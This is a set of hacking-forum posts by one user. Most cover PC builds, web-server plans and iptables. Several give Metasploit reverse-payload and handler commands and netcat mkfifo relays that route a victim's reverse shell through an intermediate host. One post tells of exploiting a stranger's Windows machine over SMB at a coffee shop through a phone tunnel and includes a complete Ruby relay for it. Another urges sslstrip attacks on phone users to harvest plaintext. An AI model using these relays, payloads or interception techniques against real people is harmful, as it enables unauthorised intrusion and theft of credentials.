
i8igmac

Dedicated Members
  • Posts: 939
  • Joined
  • Last visited
  • Days Won: 22

Posts posted by i8igmac

  1. So, if this makes sense... this is what I remember doing... (on a droid at the moment)...

    To bypass the problem you experience with Metasploit, I had to set up a proxy on the Kali localhost, so that you set LHOST/LPORT for your multi/handler to localhost.

    Kali (terminal 1: the handler, listening on localhost:4444)

    msfpayload <reverse payload> LHOST=ssh-box LPORT=1234 X > test.exe
    msfconsole
    use exploit/multi/handler
    set PAYLOAD <same reverse payload>
    set LHOST 127.0.0.1
    set LPORT 4444
    exploit

    Now start a netcat proxy with mkfifo to pass the payload to your ssh-box (improper syntax):

    Kali (terminal 2)

    mkfifo pipe
    # the handler already owns 4444, so this side connects to it; start the ssh-box relay first
    nc ssh-box 5555 0<pipe | nc 127.0.0.1 4444 1>pipe

    Now your ssh-box needs to accept this and pass it to the victim; notice 2 ports need forwarding.

    ssh-box

    mkfifo pipe
    # 5555 takes the Kali side, 1234 takes the victim; bytes cross through the fifo
    nc -l -p 5555 0<pipe | nc -l -p 1234 1>pipe

    Now your victim executes the exe that connects back to ssh-box:1234... it's a brain twister of ports and pipes. Wish I was at my computer for a proper example.

  2. I may have come across this. I was successful in getting a reverse shell through a tunnel. In the video above I accomplished exactly what you are trying to do... BUT I tunneled the traffic through my android phone. I had to explore other types of tunnels; I made my own tunnel out of Ruby sockets in this video, but I found netcat is simplest!

    Try a generic reverse shell... no staging or anything.

  3. Try another payload, without the stage.

    There are 3 machines involved in your project?

    Kali--->SSH-BOX<---victim? ?

    Your ssh-box is the only machine that can port forward?

    I suggest running a small test. With netcat you can perform hello world examples.

    Also, in the link you provided, scroll down and you will see a netcat example like mine...

  4. $ mkfifo mypipe

    $ nc -l 8082 0<mypipe | nc yahoo.com 80 1>mypipe

    Your netcat syntax may be different. Here is what mine looks like: nc -l -p 8082

    This is a basic proxy. Now from another terminal connect to this port 8082 and paste in a proper Yahoo GET request.

    If this is simple enough we can move on to a reverse proxy.

  5. Did you have to boot up from a live disk? For those that want to recover deleted files: shut down the machine right away!

    A really nice tool I used a few weeks ago: testdrive.

    Just open the location of the file you want to recover and you will see highlights in red.

  6. I like CUDA GPU cracking... so I went Nvidia with CUDA support...

    I would look for a 6-core AMD CPU... I spent 250 US dollars two years ago... you could find one for around 100.

    I also paid for a 60 GB SSD 2 years ago, and now the price has gone way down...

    You will love this setup.

  7. Get a big cheap Cooler Master shell; mine allows easy access for the hard drives to slide in and out. Good fan locations.

    Get a solid state drive, only big enough to install your OS.

    I would get last year's AMD 6-core CPU. Good bang for the buck.

    Go big on your video card.

    Cheap on the basics...

  8. Watch "metasploit_Reverse_proxy Android phone" on YouTube

    metasploit_Reverse_proxy Android nonroot phone:

    I'll try to explain as best I can... the video needs narration...

    From a coffee shop, holding my droid, I SSH into the BackTrack desktop I have at home.

    My droid phone starts a reverse Ruby proxy on the desktop; my phone then establishes 2 connections...

    One of those connections is to a local Windows machine at the coffee shop that has SMB port 135 open.

    The second connection is back to the Ruby reverse proxy running on the BackTrack desktop...

    So now there is a tunnel where the BackTrack desktop can send data as shown below:

    Backtrack->droidphone->coffee-shop-machine=smb:135->

    Now from the droid that has SSH to BackTrack, start up Metasploit and configure an SMB exploit with the proper ports... reverse shell is successful!

    All done with simple proxy work; notice Metasploit loads in 5 seconds! Non-root droid.
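The relay that posts 1, 4 and 8 describe, written out as an added example in Ruby sockets (this is not the poster's proxy or the code from the video). Posts 1 and 4 chain two netcat processes through a named pipe; post 8 does the same job with a "reverse Ruby proxy": the desktop end listens on two ports and bridges whoever connects, while the middle box (the phone, or the ssh-box in post 1) dials out to both the desktop and the target. Everything below runs on 127.0.0.1, with a constructed echo server standing in for the target service, so it works offline; in the real setup the middle box would dial the desktop's public address and the target's SMB port, and the exploit module would be pointed at the local listener.

```ruby
require 'socket'

# Added example (not the poster's code): a two-hop TCP relay in Ruby sockets,
# the same shape as the netcat/mkfifo proxies in posts 1 and 4 and the
# "reverse ruby proxy" in post 8. All addresses are 127.0.0.1 and the target
# is a constructed echo server, so the whole thing runs offline.

# Copy bytes from src to dst until src reaches EOF, then half-close dst so the
# far side sees EOF as well. A reset or already-closed socket just ends the copy.
def pump(src, dst)
  loop { dst.write(src.readpartial(4096)) }
rescue EOFError, IOError, SystemCallError
  nil
ensure
  begin
    dst.close_write
  rescue IOError, SystemCallError
    nil
  end
end

# Bridge two connected sockets in both directions; returns once both directions
# have drained, then closes both ends. This is what "nc ... 0<pipe | nc ... 1>pipe" does.
def bridge(a, b)
  threads = [Thread.new { pump(a, b) }, Thread.new { pump(b, a) }]
  threads.each(&:join)
ensure
  [a, b].each { |s| s.close unless s.closed? }
end

# Desktop side (post 8's "reverse proxy", post 1's ssh-box): two listeners. The
# middle box dials in on relay_port; the local client (the exploit module with
# RHOST 127.0.0.1) dials local_port. Once both have connected they are bridged.
class ReverseProxy
  attr_reader :relay_port, :local_port

  def initialize(relay_port = 0, local_port = 0)   # 0 = pick a free port
    @relay_srv = TCPServer.new('127.0.0.1', relay_port)
    @local_srv = TCPServer.new('127.0.0.1', local_port)
    @relay_port = @relay_srv.addr[1]
    @local_port = @local_srv.addr[1]
  end

  # Handles one pair of connections, in either arrival order, then tears the listeners down.
  def run
    relay_sock, local_sock = [@relay_srv, @local_srv].map { |srv| Thread.new { srv.accept } }.map(&:value)
    bridge(relay_sock, local_sock)
  ensure
    [@relay_srv, @local_srv].each(&:close)
  end
end

# Middle box (the non-root phone in post 8): two outbound connections, one back
# to the desktop and one to the target, then pump bytes between them.
def forward_relay(desktop_host, relay_port, target_host, target_port)
  upstream = TCPSocket.new(desktop_host, relay_port)
  target   = TCPSocket.new(target_host, target_port)
  bridge(upstream, target)
end

# Constructed stand-in for the target service: a one-shot echo server on an
# ephemeral port. Returns the port number.
def start_echo_server
  srv = TCPServer.new('127.0.0.1', 0)
  Thread.new do
    conn = srv.accept
    pump(conn, conn)   # echo until the client half-closes, then half-close back
    conn.close
    srv.close
  end
  srv.addr[1]
end

# Wire the three hops together on localhost, send `payload` from the desktop-side
# client through desktop -> middle box -> target, and return what came back.
def relay_round_trip(payload)
  target_port  = start_echo_server
  proxy        = ReverseProxy.new
  proxy_thread = Thread.new { proxy.run }
  relay_thread = Thread.new do
    forward_relay('127.0.0.1', proxy.relay_port, '127.0.0.1', target_port)
  end

  client = TCPSocket.new('127.0.0.1', proxy.local_port)
  client.write(payload)
  client.close_write                 # end of request; the echo replies, then EOFs
  reply = client.read.to_s.b
  client.close
  [proxy_thread, relay_thread].each(&:join)
  reply
end

if __FILE__ == $PROGRAM_NAME
  puts relay_round_trip("GET / HTTP/1.0\r\n\r\n").inspect
end
```

The bridge copies raw bytes in both directions and propagates each side's half-close, so it is protocol-agnostic: the same code carries an HTTP request, an SMB exchange or a reverse shell. Like the netcat chain it handles one connection pair and then exits; a multi-session version would accept in a loop and bridge each pair in its own thread.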

  9. My learnings on MITM vs smartphones...

    Depending on the user's habits: Facebook, banking, Twitter... etc...

    Does the user browse his Facebook with the web browser? (sslstrip is fantastic)

    If the user browses his accounts with a specific application other than the browser, then depending on that application's security... sslstrip won't work.

    (I only checked the Facebook app)

    There are other tools: sslsniff and sslsplit.

    The Facebook app blinks red (alert warning) at my attempts to fake the cert...

    So, I would like to see some others run tests and share what they find... test the popular apps and see what plain text you can gather...

  10. Checkers is just an example; I will have to check out some Ruby web stuff... I figured that the stats displayed will come from /users logged/game history/game moves/gold won/etc...

    I could bypass the use of a database; instead I could use encrypted text files. This would be quicker for me... but I'm afraid this will be a mistake...

    file_name_user_bob.stats

    is_logged_in=true

    stats=1234

    gold=100

    games played=50

    etc=some otherstuff

    If I could use Ruby 100% of the time it would be convenient, but maybe a mistake? (I'm comfortable with Ruby) (PHP is possible) (MySQL: clueless)

  11. I plan on devoting lots of time to building a webserver. I'm looking for tips and advice...

    I will first start with VirtualBox and a default install of Ubuntu Server edition (what OS do you recommend? Anything already configured out of the box? I like deb).

    My first step, I feel, is to make a home page, as it will be the template for the rest of the way.

    User registration: I have found some secure examples online.

    Multiple device screen size friendly... any advice?

    As a web dev, what is your routine for starting a new site? Do you use a framework?

  12. iptables seems to be the solution. I would like to extend my knowledge on this subject.

    I have installed DD-WRT on a few routers... one feature is iptables...

    Blocking torrents with iptables is simple. I would like to see some examples of giving torrent traffic a throttle or low priority.
